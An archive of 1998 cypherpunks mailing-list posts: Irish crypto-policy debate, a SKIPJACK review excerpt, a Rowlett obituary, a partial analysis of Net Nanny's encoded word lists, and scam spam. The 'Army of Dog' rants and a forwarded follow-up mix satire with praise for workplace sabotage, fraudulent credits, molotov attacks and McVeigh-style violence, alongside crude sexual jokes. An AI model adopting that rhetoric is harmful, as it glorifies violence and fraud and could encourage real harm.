children's education.

Many are already using our program to generate funds for
their family reunion occasions, anniversaries, weddings and
even more...
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
Learn How your Family, Business, Church / Organization can receive 
thousands of dollars month-after-month, year-after-year.

There is  
         ABSOLUTELY NO INVESTMENT COST TO YOU.

Free...CONTINUOUS REVENUE in 30 days.              

Visit our website:
  http://www.indianajonescorp.com/html/unidial-free.html 

The Indiana Jones Corporation
Midwest Corporate Headquarters    
Portage, Indiana 46368  
phone (219) 764-2515
fax (219) 763-2692         
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 2 Jul 1998 16:46:11 -0700 (PDT)
To: jmcc@hackwatch.com
Subject: Re: IE Frees Crypto
In-Reply-To: <359BCD11.30DEF3CD@hackwatch.com>
Message-ID: <199807022345.QAA07915@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


John McCormac writes:
 
[about Irish crypto legislation]
 
> <quote>
>  In order to enable lawful access to encrypted data, legislation will
> be enacted to oblige users of encryption products to release, in
> response to a lawful authorisation, either plaintext which verifiably
> relates to the encrypted data in question or the keys or algorithms
> necessary to retrieve the plaintext. Appropriate sanctions will be put
> in place in respect of failure to comply.
> </quote>
> 
> This seems to be carefully considered in that the user could be asked to
> prove the encrypted document contains the encrypted form of the
> plaintext. But the most important thing is that a search warrant would
> be required to force the user to give up the plaintext or the key.

It says "lawful authorisation" not "search warrant".

That means that sometime later they can go back and
pass another law that says that "lawful authorisation" for
forcing one to reveal one's plaintext or keys is something
much less stringent than a search warrant.
Most proposed US crypto regulations have similar weasel-words.



-- 
Eric Murray  Chief Security Scientist  N*Able Technologies  www.nabletech.com
(email:  ericm  at  lne.com   or   nabletech.com)          PGP keyid:E03F65E5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 2 Jul 1998 16:59:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Finally... a One-Time-Pad implementation that works!!!
Message-ID: <359C1F2B.5DF4@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain


Hmmm...good thing we don't step in it...
-- 
..............................
. Michael Motyka             .
. LSI Logic Corporation      .
. 5050 Hopyard Rd. Suite 300 .
. Pleasanton, CA 94588       .
.                            .
. mmotyka@lsil.com           .
. Voice    925.730.8801      .
. FAX      925.730.8700  :)  .
..............................




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Thu, 2 Jul 1998 08:58:30 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: IE Frees Crypto
In-Reply-To: <199807021125.HAA06437@camel7.mindspring.com>
Message-ID: <359BAE16.58832781@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
> 
> Source: http://go2.guardian.co.uk/paper.html
> 
> The Guardian Online, Microfile, July 2, 1998
>
> access to encrypted messages. Ireland places no
> restrictions on the use, import or export of encryption
> products. Individuals can choose to offer a plain text
> version of the encrypted document or hand over a key,
> if a search warrant is proffered. The document was

I have a language problem. Does this mean that the authority
depends on the honesty of the individual who hands over
a plain text saying that it corresponds to the ciphertext
or else how is the intent of the authority to obtain the
true plain text to be achieved?

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Thu, 2 Jul 1998 18:20:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Army of Dog - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C896E.CFA3F8E0.5@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Army of Dog - SPACE ALIENS HIDE M DRUGS!!!
___________________________________________


                   Bienfait Nutly News
                "ANARCH IS OUR ONL HOPE"
                    Christmas Special
                    *****************
                    by King Author and the Dark&Stormy
                    Knights of the Magic RoundTable


A Personal Note From An Army of Dog Prisoner Of War:

To: remailer-operators@dev.null
From: DaltonGang@Dev.Null

  Since my meatspace body is currently hanging on a 
federal meathook, my consistent meatspace identity
is currently available for those who wish to rent
it.
  Given the high value of the BadReputationCapital 
currently connected to my consistent meatspace 
identity, I don't feel I am remiss in requiring both
a small monetary remittance to:
    James Bell #26906086
    Federal Detention Center
    P.O. Box 68976
    Seattle WA 98168
as well as Executive Editor credits on any InterNet
website or email account that uses my consistent
meatspace persona to send threatening letters to
goverment agencies, officials and employees, to
run Assassination Politics Bots, or to engage in
activities which violate the conditions of my parole,
including, it seems...breathing.

James Dalton Bell
"They also serve, who only bend over and wait."

-----Pretty Monitored Privacy Public Cell Key-----
OuCh#$!tHAthuRts*&^nOOooOnotSAnd!!!OKwhO'SNexT????
--------------------------------------------------


Questionable Quotes #37:
"If the Army of God can kill so many people from the
 Missionary Position, where the risk of transmitting
 AIDS is comparitively low, then the Army of Dog
 should be that much more effective, working Doggie
 Style..."
~The Unknown CypherPunk (aka TCM)
 CypherPunks Cult of One
 Bay Area Addition

  The recent phenomena of the Army of Dog, which has had a
long history of never before existing, is rumored by many
to be a splinter group of the Circle Of Eunuchs, which had
come into existence as a result of an announcement on 
December 7, 1989, by Bubba Rom Dos, that the existence such
a group would be extremely dangerous to those involved, and
that everyone assembled should immediately disband and have
no further contact with one another.
  The Circle of Eunuchs, a wholly owned subsiduary of the
Magic Circle, headquartered nowhere, has managed to keep  
their heads, as well as avoid being drawn and quartered, 
by never really existing. Although consisting of 3-member
Gorilla Cells whose manner and method of their use of 
bananas is totally up to the individuals involved, based
on their personal ethics and morals, none of the members
can ever really be certain that the CoE actually exists,
although it is pretty hard to deny the existence of the
bananas, if you have made the mistake of choosing your
fellow CoE Gorilla Cell members randomly from ads in
the free magazines widely available in San Franciso.

  The Army of Dog operates much along the same lines, with  
the major difference being that more of the members choose  
to act alone, in solitary Cult of One units, with the more
moderate members generally requiring reading glasses, while
the more radical members eventually go blind.
  Seasoned warriors, they refuse to ask for pity or sympathy,
having only themselves to blame, 'cause momma tried...  


Questionable Quotes #896:
"ou don't have to have a bottle of Mercetan to know
 which way Janet Reno is blowing."
~JDB
 BellWeatherMen Cult of One
 Seattle AboveGround Cell

  Army of Dog recruits, going one step further than the
Army of God members who have so successfully avoided being
hunted down like dogs by LEA's around the country, perform
many of their nefarious activities on behalf of causes that
they have little or no connection to, little or no interest
in, and do not necessarily believe in.
  For example, an Army of Dog Virtual Warrior who is very
passionate in their feeling regarding the demonization and  
persecution of Kevin MitNikita, but who thinks that Jerome
Dalton Bell is an asshole who got what he had coming to him,
would naturally gravitate toward performing subversive
actions which violated the conditions of Bell's parole.
(If that AoD Warrior was a minor, they might even be bold
 enough to join with other minors in small Saskatchewan
 towns, acting in concert with NineInchNails, knowing they
 would not have to worry about being tried as an adult,
 since they could prove that their uncle, the Author, was
 not even an adult.)
  On the other hand, a CypherPunks Army of Dog Virtual
Warrior, who feels indebted to Jim Bell for the blow jobs
while awaiting trial (even though he *did* have to hold
a knife to Jim's throat, since Jim was playing 'hard to
get'), would perform their subversive activities on 
behalf of the UnaBomber, who they thought was a fucking
lunatic who was better off locked up.
(For instance, they might perform a variety of low-key
 meatspace crimes, such as setting the Dumbarton bridge
 on fire, just before the UnaBomber's trial, and then
 notify the President by email that they were ready to
 step in and take the UnaBomber's place if he was
 executed. Natually, they would do this from a hacked
 account...)


Questionable Quotes #486:
"Give them Flack, John."
~Bob
 Church of the SubGenius Cult of One
 Davis-Monathan Division

  Many Army of Dog recruits are LEA's and paid government
informants who tried to infiltrate the AoD, but who got
a little carried away and eventually ended up performing
some act of meatspace violence so atrocious that they had
to quickly find a scapegoat such as Timoth McVeigh, to
take the fall.
(Although the agent code-named Defcon McCullagh Chainsaw
 claims he was just there to cover the bombing, in a
 free-lance assignment for the Oklahoma Nutly News, he
 has thus far failed to adequately explain submitting 
 a receipt for breakfast with the BATF shortly before
 the explosion, or why the BATF would be having champagne
 and caviar for breakfast, saying only, "Eggs is eggs...")


Questionable Quotes #8:
"I never minded about the little things."
~Bridget Fonda
 The Author's Secret Lover Cult of One

  Although both Army of Dog Virtual Warriors and MeatSpace
Warriors are quick to point out that sex after plugging a
strangers parking meter, or setting off the fire alarm 
at the local school via modem, is phenomenal, they also 
point out that it doesn't hurt to have a co-conspirator 
(sometimes spelled without the hyphen).
  One Army of Bitch WarriorGoddess, speaking about her 
long-time relationship with an AoD programmer, said, 
"Although he starts with a relatively small value of 'c', 
he always increments it, and sometimes puts it through 
what seems to be an endless loop."
(For the non-computer oriented, that loosely translates
 as, "He may not touch bottom, but he sure raises hell
 with the sides.")


Questionable Quote #1:
"Bite them all, and let the Veteranarian sort them out."
~Rabid WarMongrelBat
 Marisupial Cult of One

If ou Can't Erase The Hard Drive Of The One ou Hate,
Erase The Hard Drive Of The One ou're With:
  'The Book of Big Mischief' (not to be confused with a much
better work, with a similar name), advises that any Army of
Dog member who plans to throw a serious, possibly traceable
Hex/Screw into the Back(Door) of a government, corporate,
religious or social entity/system via the tools of their
own workplace, should take great pains to make certain
that their office space contains:
1. American Flag
2. Apple Pie (preferrably baked by your mother)
3. Bible (*not* the New Age Aquarian version)
4. "I Love MicroSoft" Stickers
5. Pictures of the President AND Newt Gingrich
6. A Timothy McVeigh Dartboard
7. A Shrink-Wrapped Copy Of CyberNanny
8. An unfinished, hand-written letter to Louis Freeh,  
  stating that you suspect your supervisor of being
  an anti-government radical.
9. Bail Money

Questionable Quote #2-A:
"A little Byte goes a long way, particularly if you don't
 let go."
~Baby TruthMonger
 Army of Bitch 
 
Questionable Quote #2-B:
"Something small is going to happen...but it's going to
 happen a lot of times...July 5, 1998, 07:09"
~The Arthur
 Army of Dog / Cult of Nun

One For ou, One For Me...Two For ou, One, Two For Me:
  Craperate and Goobermint BeanCounters *do* mind about the  
little things, but these things are unlikely to come to their
attention if the DataEntryOperator and/or the Auditor are
Army of Dog recruits.
  A multitude of mistaken credits to your own account is 
fraud. A multitude of fraudulent credits to the account of
a charitable or subversive organization to which you have
no connection is a mistake.


If ou Don't Unnerstan Nuthin Else, Understand This:
  Joe Montana was a Dan Fouts with a front line.
  General Eisenhower was a General Lee with a front line.
  Winston Churchill was a Neville Chamberlain with a back door.
  Censorship Czars aren't afraid of quarterbacks, generals and
leaders. They are afraid of men and women in trenches, behind
data-entry screens, and people with flashlights, peering into
the dark and hidden places.
  The Enemies of Freedom of Speech are not afraid of someone
yelling "Fire" in a crowded theater--that is a StrawDog they
use to prevent someone yelling "Fire" before their agents are
clear of the Reichstag, or the Murrah Federal Building.
  Friends of the Destroyer can whack a King, a Kennedy, or a
KonspiratorToBeNamedLater, but they can't whack out things
they can't see--like concepts, ideals, values and free
thought--but they are trying...
  If the Voices of Kings, Kennedys and Konspirators are not
reaching the far walls of the ElectroMagnetic Curtain, and
echoing throughout the Tao of CyberSpace, then the Friends
of the Destroyer, the Enemies of Freedom, will prevail.
  The Voice of the Tao Whispers...
  The Voice of Infinity Thunders...
  The Voice of Censorship is Silent...
  The Voice of Freedom is ou!


The Most Dangerous Person On Television:
  ou...the viewer.

The Most Dangerous Person On The InterNet:
  ou...the participant.

Anarchy Is Our Only Hope...


Army of Dog Prisoners of War:
  Tim Bell
  Jim McVeigh
  Nelson Ghandi
  Mahatma Mandella
  Avery Body
  Elsie Mittnick
  Human Gus-Peter

Free Army of Dog Warriors:
  Us...except for you and me <nod-nod><wink-wink>


The rEvolution isn't tomorrow...that will be too late.
The rEvolution wasn't yesterday...the battle lines have moved.
The rEvolution Is NOW!

Questionable Quote #709:
"Close ranks, every man for himself!"
~Chief CypherPunks SpokesPerson
 Army of DoGod, Cult of Nun

  Anarchy Is Our Only Hope...Together, We Can Make It Happen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 2 Jul 1998 15:29:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Code Wizard Frank Rowlett Dies
Message-ID: <199807022229.SAA20296@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Frank Rowlett, a founder of NSA's National Cryptologic School,
has died at 90. The New York Times has an obituary on the
"code wizard" today:

   http://jya.com/nsa-rowlett.htm

Rowlett was one of three earliest recruits of William Friedman,
head of the the US Army Signal Intelligence Service, a 1930s 
forerunner of NSA's "massive cryptologic system today" (Kahn). 
After a long career in Army cryptology Rowlett served with the 
CIA and was special assistant to the DIRNSA at the end of his 
service in the 1960s.

He is credited with helping to break the Japanese RED and 
PURPLE codes, efforts unlerlying the Allies World War II 
MAGIC cryptanalysis system.

He was also an inventor, following work of others, of the
SIGABA machine, the US Army's version of Hebern's 
cipher device, and  held other cryptologic patents.

David Kahn has tart remarks in The Codebreakers about 
how Friedman, and to a lesser extent, Rowlett, got national 
awards for work done by others, through "well-situated
friends, picayune mechanical differences, and a great but
totally irrelevant record." (page 392) 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John McCormac <jmcc@hackwatch.com>
Date: Thu, 2 Jul 1998 11:14:38 -0700 (PDT)
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: IE Frees Crypto
In-Reply-To: <199807021125.HAA06437@camel7.mindspring.com>
Message-ID: <359BCD11.30DEF3CD@hackwatch.com>
MIME-Version: 1.0
Content-Type: text/plain


Mok-Kong Shen wrote:
> 
> John Young wrote:
> >
> > Source: http://go2.guardian.co.uk/paper.html

The Guardian article is probably not as good as the real thing :-) and
so I've quoted excerpts from it here. The full document is on:
http://www.irlgov.ie/tec/html/signat.htm 

(John, it would be better to quote the actual document on your page as
the Guardian article is only a limited view.) 


Ira Magaziner was in negotiation with the Irish government over this and
some meetings were held in secret. I am still trying to get all the
facts on this one. 

<quote>
 Users shall have the right to access strong and secure encryption to
ensure the confidentiality, security and reliability of stored data and
electronic communications.

 Users shall have the right to choose any cryptographic method.

 The production, import and use of encryption technologies in Ireland
shall not be subject to any regulatory controls other than obligations
relating to lawful access.

 The export of cryptographic products is to continue to be regulated in
accordance with the relevant EU Regulations and Decisions and Irish
national legislation which reflect the Wassenaar Arrangement on Export
Controls for Dual-Use Goods and Technologies and Conventional Arms.
</quote>

This one is worrying as the gobshites in the EC are capable of really
banjaxing the situation. Since EU Directives are law when they are
published, they could well cause a bit of legal conflict. Under EU
legislation, at least one of my books could be banned.

<quote>
 In order to enable lawful access to encrypted data, legislation will
be enacted to oblige users of encryption products to release, in
response to a lawful authorisation, either plaintext which verifiably
relates to the encrypted data in question or the keys or algorithms
necessary to retrieve the plaintext. Appropriate sanctions will be put
in place in respect of failure to comply.
</quote>

This seems to be carefully considered in that the user could be asked to
prove the encrypted document contains the encrypted form of the
plaintext. But the most important thing is that a search warrant would
be required to force the user to give up the plaintext or the key.
Surprisingly it could be interpreted so that the user only has to prove
the link rather than giving up his or her key.

<quote>
2. Electronic Signatures

 Legislation will be enacted to facilitate the use of electronic
signatures through the establishment of a framework for the
authorisation of bodies to act as nationally accredited Certification
Authorities.
</quote>

This is unusual - could this mean that each Irish citizen would have
their own Cert/sig? Everyone who works in Ireland or avails of any state
services seems to have an RSI number (just like the SS number in the
US). They introduced mag strip cards for unemployment benefits a few
years ago.

I am currently working on an article about this proposal on crypto and
will post it when I finish it.

Regards...jmcc
-- 
********************************************
John McCormac            * Hack Watch News
jmcc@hackwatch.com       * 22 Viewmount, 
Voice:   +353-51-873640  * Waterford,
BBS&Fax: +353-51-850143  * Ireland
http://www.hackwatch.com/~kooltek
********************************************

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzAYPNsAAAEEAPGTHaNyitUTNAwF8BU6mF5PcbLQXdeuHf3xT6UOL+/Od+z+
ZOCAx8Ka9LJBjuQYw8hlqvTV5kceLlrP2HPqmk7YPOw1fQWlpTJof+ZMCxEVd1Qz
TRet2vS/kiRQRYvKOaxoJhqIzUr1g3ovBnIdpKeo4KKULz9XKuxCgZsuLKkVAAUX
tCJKb2huIE1jQ29ybWFjIDxqbWNjQGhhY2t3YXRjaC5jb20+tBJqbWNjQGhhY2t3
YXRjaC5jb20=
=sTfy
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blkjck@gate.net
Date: Thu, 2 Jul 1998 20:39:35 -0700 (PDT)
To: Friend@public.com
Subject: Win At Blackjack
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


"This is a one time mailing, if you are not interested, simply hit 'delete'."


Win at Blackjack


Fed up at losing your hard earned money in a casino?

Fed up with the loser's drive home?

Fed up with being in a multimillion dollar luxury casino and wondering which part you helped finance?

Well learn how to play the game! Give yourself a fighting chance...

I am a twenty-seven year veteran of the Casino Industry and I paid for my computer amongst many other items by playing Blackjack using this method.

Its simple to understand, no card counting involved, and will take minutes to learn........ Good Luck!


Send $21 and your mailing address to :                        (Free Shipping):

J.R.Nyman
8401 South Wood Circle
Apt #13
Fort Myers, FL  33919










Thank you for your time....
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John McCormac <jmcc@hackwatch.com>
Date: Thu, 2 Jul 1998 17:04:24 -0700 (PDT)
To: Eric Murray <ericm@lne.com>
Subject: Re: IE Frees Crypto
In-Reply-To: <199807022345.QAA07915@slack.lne.com>
Message-ID: <359C200A.C113F0BA@hackwatch.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray wrote:
> 
> John McCormac writes:
> 
> [about Irish crypto legislation]
> 
> > <quote>
> >  In order to enable lawful access to encrypted data, legislation
> will
> > be enacted to oblige users of encryption products to release, in
> > response to a lawful authorisation, either plaintext which
> verifiably
> > relates to the encrypted data in question or the keys or algorithms
> > necessary to retrieve the plaintext. Appropriate sanctions will be
> put
> > in place in respect of failure to comply.
> > </quote>
> >
> > This seems to be carefully considered in that the user could be
> asked to
> > prove the encrypted document contains the encrypted form of the
> > plaintext. But the most important thing is that a search warrant
> would
> > be required to force the user to give up the plaintext or the key.
> 
> It says "lawful authorisation" not "search warrant".
> 
> That means that sometime later they can go back and
> pass another law that says that "lawful authorisation" for
> forcing one to reveal one's plaintext or keys is something
> much less stringent than a search warrant.
> Most proposed US crypto regulations have similar weasel-words.

Yep Eric,
I think that most people have jumped the gun here on this one. These are
not the actual regulations. They are only part of a framework proposal
so the eventual legislation could be lightyears removed from these
principles. (In fact given that most of the discussions between Ira
Magaziner and the Irish government were carried out in secret, I think
that the eventual legislation will be riddled with loopholes. Guess we
may have become the 51st state and we didn't even know. :-) ) The
problem is that most of the journos who wrote about it are relatively
clueless on the crypto aspect of things. There was some input from
Electronic Frontier Ireland  (Irish version of EFF) on the principles so
that is a good thing.


Regards...jmcc
-- 
********************************************
John McCormac            * Hack Watch News
jmcc@hackwatch.com       * 22 Viewmount, 
Voice:   +353-51-873640  * Waterford,
BBS&Fax: +353-51-850143  * Ireland
http://www.hackwatch.com/~kooltek
********************************************

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzAYPNsAAAEEAPGTHaNyitUTNAwF8BU6mF5PcbLQXdeuHf3xT6UOL+/Od+z+
ZOCAx8Ka9LJBjuQYw8hlqvTV5kceLlrP2HPqmk7YPOw1fQWlpTJof+ZMCxEVd1Qz
TRet2vS/kiRQRYvKOaxoJhqIzUr1g3ovBnIdpKeo4KKULz9XKuxCgZsuLKkVAAUX
tCJKb2huIE1jQ29ybWFjIDxqbWNjQGhhY2t3YXRjaC5jb20+tBJqbWNjQGhhY2t3
YXRjaC5jb20=
=sTfy
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Thu, 2 Jul 1998 21:22:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: jeopardize law enforcement and national security objectives
Message-ID: <19980703044220.28128.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



                              SKIPJACK Review
                                      
                               Interim Report
                                      
                           The SKIPJACK Algorithm
                                      
              Ernest F. Brickell, Sandia National Laboratories
                 Dorothy E. Denning, Georgetown University
              Stephen T. Kent, BBN Communications Corporation
                            David P. Maher, AT&T
                    Walter Tuchman, Amperif Corporation
   
                               July 28, 1993
   
                             (Copyright (c) 1993)
     _________________________________________________________________
   
                             Executive Summary
                                      
   The objective of the SKIPJACK review was to provide a mechanism
   whereby persons outside the government could evaluate the strength of
   the classified encryption algorithm used in the escrowed encryption
   devices and publicly report their findings. Because SKIPJACK is but
   one component of a large, complex system, and because the security of
   communications encrypted with SKIPJACK depends on the security of the
   system as a whole, the review was extended to encompass other
   components of the system. The purpose of this Interim Report is to
   report on our evaluation of the SKIPJACK algorithm. A later Final
   Report will address the broader system issues.

[...]

       We examined the internal structure of SKIPJACK to determine its
       susceptibility to differential cryptanalysis. We concluded it was
       not possible to perform an attack based on differential
       cryptanalysis in less time than with exhaustive search.

[...]

       SKIPJACK algorithm is classified SECRET NOT RELEASABLE TO FOREIGN
       NATIONALS. This classification reflects the high quality of the
       algorithm, i.e., it incorporates design techniques that are
       representative of algorithms used to protect classified
       information. Disclosure of the algorithm would permit analysis
       that could result in discovery of these classified design
       techniques, and this would be detrimental to national security.
       However, while full exposure of the internal details of SKIPJACK
       would jeopardize law enforcement and national security objectives,
       it would not jeopardize the security of encrypted communications.
       This is because a shortcut attack is not feasible even with full
       knowledge of the algorithm. Indeed, our analysis of the
       susceptibility of SKIPJACK to a brute force or shortcut attack was
       based on the assumption that the algorithm was known.
       Conclusion 3: While the internal structure of SKIPJACK must be
       classified in order to protect law enforcement and national
       security objectives, the strength of SKIPJACK against a
       cryptanalytic attack does not depend on the secrecy of the
       algorithm.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 3 Jul 1998 00:35:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Beginning of process of decrypting net-nanny files (fwd)
Message-ID: <199807030736.JAA07229@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Article 425292 of alt.religion.scientology:
Newsgroups: alt.religion.scientology
Subject: Beginning of process of decrypting net-nanny files
Date: Thu, 02 Jul 1998 00:28:03 -0700
Lines: 100
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit



There are three files with the netnanny, called d32l.dll,
n32l.dll, and p32l.dll.                                    
These are not really dlls, but are almost certainly the
database of words and phrases that the netnanny is interested
in.

If you look at these files, there is a total of 1037 lines,
each of which has from 10 or so to 60 or so characters.
It turns out (see below) that two characters in the data file
almost certainly map to 1 character of the plaintext, so
the phrases are 5 to 30 characters long.  1037 phrases of
5 to 30 characters seems about right.

If you look closely at the text, you'll see that they letters
alternate between the ranges of 32-63 and 96-127 (decimal).
That is, a line begins "1{7}.f#f".  The 1, 7, ., and #
are all in the range 32-63, and the {, }, f, and f are in the
range 96-127.  Each of these letters, then, can take one of
32 values, or five bits.  If you combine these, you find that
there are only 512 combinations used of the pairs of letters,
instead of the expected 1024 (=2^10).  It turns out that if
you construct a 10 bit word with the first 5 bits from the
first character and the second 5 from the second character,
then you find that the middle two bits are always either both 
0 or both 1.  So, there are 512 possibilities.

These 512 numbers are fairly uniformly distributed, so this is
not a simple substitution cipher.  Interestingly, though, again,
using the above construction of a 10 bit number from the two five
bit pairs, you find that the high order bits change very slowly
if at all from character to character. This is the beginning of
d32l.dll (fair use quotation of two lines from the file)

1101110001
1100110100
1100110011
0011001110
0011110000
0001110101
0010000000
0010000001
0010001111
0011001010
0001000100
0001001101
0000001110 
0010000101
0000001000
0111110101
0110110111

0110001111
0111111110
0110000101
0110111110
0110110010
0101110110
0101000010
0101111000
0110001110
0100001110
0100111011
1011000001
1011111000
1011111000
1001110010
1010000111
1010110111    
1010001000
1000111000
1011001111
1011111101
1010001011
1010111001
1101000111
1101110101
1100000011
1100110001
1100111111
1111001101
1111111011
1110001001

Note that the middle two bits are always the same, and the high
order bits seem to be changing slowly, but slowly upwards.

My guess is that some value is being added to the plaintext character,
and this value is incremented every plaintext character.  Further,
perhaps, there is a exclusive or being performed.  In any case, I hope
that this gets other people moving in the right direction.  
Suggested words to look for, that seem to have tweaked the nanny, are
xenu hemet zinjifar helena kobrin mark ingber grady ward mirele
rnewman wollersheim andreas heldal-lund operation clambake
"gilman hot springs" motherfucker cocksucker


                            




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hippyman <hippyman@alltel.net>
Date: Thu, 2 Jul 1998 20:38:32 -0700 (PDT)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Between A Rat And A Hard Place
In-Reply-To: <009C8971.590B87E0.3@west.cscwc.pima.edu>
Message-ID: <199807030338.WAA28893@client.alltel.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:40 PM 7/2/98 , Linda Reed--PCC West Campus CSC
<lreed@west.cscwc.pima.edu> wrote:
>X-URL: mailto:cypherpunks@cyberpass.net
>X-Mailer: Lynx, Version 2-4-2
>
>
>What are the implications of tossing a moltov cocktail
>through the window of banks that require those cashing
>checks to be treated like common criminals, being
>fingerprinted and having their picture taken, with a
>number attached to it?
>
>What are the implications of a Cult Of One legal system
>that pronounces those guilty of treating the individual
>as a criminal to be sentenced to a punch in the schnozz?
>
>What are the implications of refusing to provide a
>fingerprint sample, but offering to provide a sperm
>sample on the face of the check, in full view of
>all the customers who can act as witnesses?
>
>What are the implications of asking the bank teller
>if she minds undoing the first couple of buttons on
>her blouse, if you are having a little trouble
>supplying the sample?
>
>If you think _I_ am crazy, then you should have seen
>the lunatic in my bank today who acted like a criminal
>in order to get them to cash his check, by giving them
>a fingerprint--HAA!HAA!HAA!
>It used to be that you had to act _honest_ in order to
>get a check cashed.
>
>TroubleMakerMonger

Is this bitch just a fucking republican or plain crazy?
 

hippyman 
ICQ: 11517383
PGP Fingerprint: E3C3 35C8 0FD9 6F36 2ADD 0541 B58C F6BD D347 BD0A





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: one4evil@juno.com (Nalus Optic)
Date: Fri, 3 Jul 1998 07:52:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>: Re: Army of Dog - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <19980703.104911.10094.0.one4evil@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


I was asked to forward this message to the Cypherpunks list by Linda
Reed...Who sent it to me as a responce to one of my e-mails...I know that
by doing so, I risk being kicked, stomped, beated siverly amongst the
neck and shoulders, and even flamed...But I think so many of us are not
looking at the true messages involved in these 'spams'.  Reed is makeing
several REALLY good points...Given, Reed does rant a bit...And some of
what is writen is just so much bullshit...But all of it, taken in
context, is Truth (TM)...
Let me make a suggestion to Reed and all others involved...There is a
time and place for everything...The time for rEvolution, as Reed puts it,
is _NOW!_ However, Cypherpunks is not the place...So does anyone know of
any good e-lists that would love to get the ALIANS posts?  Maybe your
five minute's of thought on a way to help Reed will make everyone happy,
Vs the hours some of us are spending complaining about the damn thing.

		D
___________________________________________________________________

---Begin Forward Message---

The Geezinslaw Brothers, from Austin, TX, had a song called,
"If You Think I'm Crazy Now, You Should Have Seen Me When
 I Was A Kid."

I envy today's youngsters, who have the opportunity to 
participate in a Virtual Revolution that is every bit
as serious, and will have consequences just as great as,
any so-called World War that has ever been fought in
the history of human evolutionary development.
I envy them because they have, if they seize the 
opportunity, a chance to engage in rEvolutionary acts
of Virtual anarchy, derring-do, war & violence which will
not threaten the lives of those whose only crime is to
be in the wrong place at the wrong time, physically,
but will threaten only those whose crime is to be in
their own mindspace, at the right time for them to
be there, but refusing to allow others the same right.

I do not pass judgement on Timothy McVeigh, any more
than I pass judgement on Che Guerva, Louis Riel,
Leonard Pelltier, or Ho Chi Min.
They did what they had to do, and they used what they
thought was the best judgment and tools of their day.
Anyone who claims to judge a moral differnce between
them and those they opposed is a fucking BeanCounter,
and should be in line behind the lawyers when the
firing squads line up.
I wish that Timothy McVeigh could have done what he did
within the confines of Digital Reality, on the InterNet,
perhaps blowing a hole in the ElectroMagnetic Curtain
that would allow the children to survive, but also allow
them to glimpse what was on the other side of the wall,
so that it could not be denied once the hole was closed.
That was not to be...

[KFor all of the sincere intent underlying my TruthSPAMing
and RealityBlathering, I find myself at a loss to truly
describe what I see as the importance of those entering
the Digital/Global/Interactive Age that is being born to
realize that *they* will be the ones who either allow the
dinosaurs of the past to usurp the current rEvolution of
human development, or to act as the Founding Fathers ojf
a Global/Digital Democracy, recognizing that the dinosaurs
are wearing red, marching in straight lines, and cussing
out the shit-disturbers as cowards for hiding behind
Digital Trees known as Remailers. 

The Great Myth is that there isn't enough to go around.
Enough *what*?
Money? - There's as much as we agree there is...
Time? - I spent a good part of the day sitting on my ass...
Love? - I love Janet Reno and Louis Free. They're great targets...
Cadillacs? - Any President who proposed to block communism in
  southeast Asia would have been laughed out of office. It turns
  out that it would have saved us money and invigorated the
  auto industry.

Cadillacs? - Any President who proposed to block communism in
  southeast Asia by buying everyone a Cadillac would have been
  laughed out of office. It turns out that it would have saved
  the US money and invigorated the auto industry. 
Freedom & Privacy? - Like Cadillacs, there is as much as we
  are willing to pay for. We are not going to be able to have
  it, however, until we are ready to make the giant leap of
  faith it takes to trust that $30,000 is better spent in
  promoting Freedom & Privacy, than buying another toilet
  seat for the Censorship CCoommiittee executive restroom.

If there is enough BullShit to go around, then, according to
the Eternal Laws of the Tao, there is enough Reality to go
around, as well.
Those who recognize the Reality that I profess as the 
TruthMonger might get the impression that I am attempting
to hoard the Truth, because their isn't enough to go around.
